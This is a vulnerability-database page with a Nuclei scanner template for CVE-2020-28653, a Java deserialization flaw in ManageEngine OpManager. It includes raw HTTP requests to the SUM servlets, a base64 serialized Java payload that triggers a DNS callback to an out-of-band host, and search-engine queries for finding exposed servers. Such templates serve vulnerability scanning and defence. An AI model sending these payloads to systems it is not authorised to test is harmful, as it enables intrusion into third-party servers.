漏洞描述
Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
CVE-2020-28653: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
PoC代码[已公开]
id: CVE-2020-28653
info:
name: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
author: iamnoooob,pdresearch
severity: critical
description: |
Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
impact: |
Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
remediation: |
Update to build 125203 or later.
reference:
- http://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28653
epss-score: 0.90182
epss-percentile: 0.99558
cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
metadata:
vendor: zohocorp
product: manageengine_opmanager
shodan-query:
- http.title:"opmanager plus"
- http.title:"opmanager"
fofa-query:
- title="opmanager plus"
- title="opmanager"
google-query:
- intitle:"opmanager plus"
- intitle:"opmanager"
tags: cve,cve2020,packetstorm,java,deserialization,rce,opmanager,intrusive,vuln,vkev
variables:
oast: ".{{interactsh-url}}"
payload: "{{padding(oast,'a',50,'prefix')}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(body, "ManageEngine")'
condition: and
internal: true
- raw:
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{base64_decode('rO0ABXcEAAAD6g==')}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{replace(base64_decode('AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=='),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', payload)}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
# digest: 4a0a0047304502200a9583338614f1b0fcb70a9f8dd366657ed1345337304d7d2d7041a16d728e2b022100e7aff127931f97fd37b3b04b68de5d32d66fc5c9cce59cdc24b49717beeca349:922c64590222798bb761d5b6d8e72950